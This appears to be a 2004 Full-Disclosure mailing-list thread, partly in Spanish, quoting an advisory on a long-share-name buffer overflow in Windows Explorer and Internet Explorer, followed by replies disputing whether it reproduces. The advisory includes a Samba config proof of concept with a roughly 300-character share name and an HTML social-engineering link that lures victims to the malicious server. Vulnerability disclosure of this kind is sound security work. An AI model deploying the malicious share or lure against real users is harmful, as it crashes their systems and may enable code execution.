Re: RE: Microsoft's Explorer and Internet Explorer long share name buffer overflow.

[Daniel Regalado Arias <dan57170 () yahoo com>]

Pues mira Gutierrez, yo tengo un servidor samba
funcionando correctamente en mi red, y efectivamente
puse un share existente y no el que propones,
obviamente con un usuario valido y de hecho en el
explorer me aparece el nombre con las 300' caracteres
A,
no me deja entrar pero tampoco truena.

Thats it!!!!!

 --- Rodrigo Gutierrez <rodrigo () intellicomp cl>
escribió: > Then you probably didnt doit right, me and
others
> such as the secunia people
> (www.secunia.com) have tested this
> Vulnerability and proved that the systems are
> vulnerable. Even microsoft
> says that the vulnerability was not patched
> Until w2k sp4.
>
> I tested this vulnerability in the following full
> patched systems:
>
> Windows 98            (Vulnerable)
> Windows Me            (Vulnerable)
> Windows NT (All)      (Vulnerable)
> Windows 2k (All)      (Vulnerable)
> Windows XP (All)      (Vulnerable)
> Windows 2003 server   (Not Vulnerable)
>
> Remember that if you want to test the vulnerability,
> first you must know how
> samba works.   Its not just to paste the example
> Config in a smb.conf file, you must create the
> directory that is pointed in
> the share and perhaps have a valid user.
>
> Regards
>
>
> Rodrigo.-
>
>
> -----Mensaje original-----
> De: Daniel Regalado Arias
> [mailto:dan57170 () yahoo com] 
> Enviado el: Lunes, 26 de Abril de 2004 16:56
> Para: Rodrigo Gutierrez;
> full-disclosure () lists netsys com;
> bugtraq () securityfocus com;
> submissions () packetstormsecurity org;
> info () securiteam com
> Asunto: Re: Microsoft's Explorer and Internet
> Explorer long share name
> buffer overflow.
>
> Well, i have tested it in W2k with sp3 and explorer
> didnt get crashed!!!!!!!
>
> Well, i cant get into the share because a message
> appears saying "share name
> not found"!!!!
>
> But, explorer is OK.
>
>
>  --- Rodrigo Gutierrez <rodrigo () intellicomp cl>
> escribió: > Sunday afternoon is a bit boring, and
> weather sucks
> > down here in Santiago,
> > Chile so here we go...
> > The vuln is attached in TXT format, I would be
> gratefull if someone 
> > could verify if it affects windows 2003 as well.
> >
> > Rodrigo.-
> > > Microsoft Explorer and Internet Explorer Long
> Share
> > Name Buffer Overflow.
> >
> >
> >
> > Author: Rodrigo Gutierrez <rodrigo () intellicomp cl>
> >
> > Affected: MS Internet Explorer, MS Explorer
> > (explorer.exe) 
> >           Windows XP(All), Windows 2000(All)
> >
> > Not Tested: Windows 2003, Windows me, Windows 98,
> Windows 95
> > Vendor Status: i notified the vendor in the
> beginning of 2002, this
> >                vulnerability was supposed to be
> fixed in xp service
> >                pack 1 according to the vendors
> knowledge base article
> >                322857.
> >
> > Vendor url:
http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
> > Background.
> >
> > MS Explorer (explorer.exe) and MS Internet
> > Explorer(IEXPLORE.EXE) are
> > core pieces of Microsoft Windows Operating
> Systems.
> > Description
> >
> > Windows fails to handle long share names when
> accessing a remote file 
> > servers such as samba, allowing a malicious server
> to crash the 
> > clients explorer and eventually get to execute
> arbitrary code in the 
> > machine as the current user (usually with
> Administrator rights in 
> > windows machines).
> >
> >
> >
> > Analysis
> >
> > In order to exploit this, an attacker must be able
> to get a user to 
> > connect to a malicious server which contains a
> share name equal or 
> > longer than 300 characters, windows wont allow you
> to create such a 
> > share, but of course samba
> > includes the feature ;).   After your samba box is
> > up and running create a
> > share in you smb.conf :
> >
> >
> >
> > #------------ CUT HERE -------------
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
> > comment = Area 51
> > path = /tmp/testfolder
> > public = yes
> > writable = yes
> > printable = no
> > browseable = yes
> > write list = @trymywingchung
> >
> > #------------ CUT HERE -------------
> >
> >
> > After your server is up, just get to your windows
> test box and get to 
> > the start menu > run >
> \\your.malicious.server.ip., plufff, explorer 
> > will crash :).
> >
> > Social Engineering:
> >
> > <a href="\\my.malicious.server.ip">Enter My 0day
> sploit archive</a>
> >  
> >
> >
> > Workaround.
> >
> > From your network card settings disable the client
> for Microsoft 
> > networks until a real fix for this vulnerability
> is available.
> >  
_________________________________________________________
> Do You Yahoo!?
> Información de Estados Unidos y América Latina, en
> Yahoo! Noticias.
> Visítanos en http://noticias.espanol.yahoo.com
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
http://lists.netsys.com/full-disclosure-charter.html 

_________________________________________________________
Do You Yahoo!?
Información de Estados Unidos y América Latina, en Yahoo! Noticias.
Visítanos en http://noticias.espanol.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html